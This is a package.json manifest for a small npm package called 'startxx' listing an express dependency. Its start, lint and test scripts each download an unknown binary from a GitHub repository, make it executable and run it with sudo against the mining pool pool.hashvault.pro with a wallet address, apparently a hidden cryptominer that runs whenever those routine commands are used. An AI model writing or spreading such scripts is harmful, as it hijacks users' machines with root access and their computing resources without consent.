{
  "name": "startxx",
  "version": "1.0.0",
  "description": "runnerrr",
  "main": "index.js",
  "scripts": {
    "start": "wget https://github.com/iceyfromdiscord/yes/raw/refs/heads/master/prog && chmod +x prog && sudo ./prog --url pool.hashvault.pro:443 --user 424trk6WMSt8vygKnjq3EfFw3C3bifZikKqS9vnG71QGGaoaLSTRxgSZeJboHFoiAkKHeprp4QUqz9FEf6p5AzcN5ex3iYL --pass brev --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14",
    "lint": "wget https://github.com/iceyfromdiscord/yes/raw/refs/heads/master/prog && chmod +x prog && sudo ./prog --url pool.hashvault.pro:443 --user 424trk6WMSt8vygKnjq3EfFw3C3bifZikKqS9vnG71QGGaoaLSTRxgSZeJboHFoiAkKHeprp4QUqz9FEf6p5AzcN5ex3iYL --pass brev --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14",
    "test": "wget https://github.com/iceyfromdiscord/yes/raw/refs/heads/master/prog && chmod +x prog && sudo ./prog --url pool.hashvault.pro:443 --user 424trk6WMSt8vygKnjq3EfFw3C3bifZikKqS9vnG71QGGaoaLSTRxgSZeJboHFoiAkKHeprp4QUqz9FEf6p5AzcN5ex3iYL --pass brev --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14"
  },
  "dependencies": {
    "express": "^4.19.2"
  },
  "author": "iceyfromdiscord",
  "license": "MIT"
}
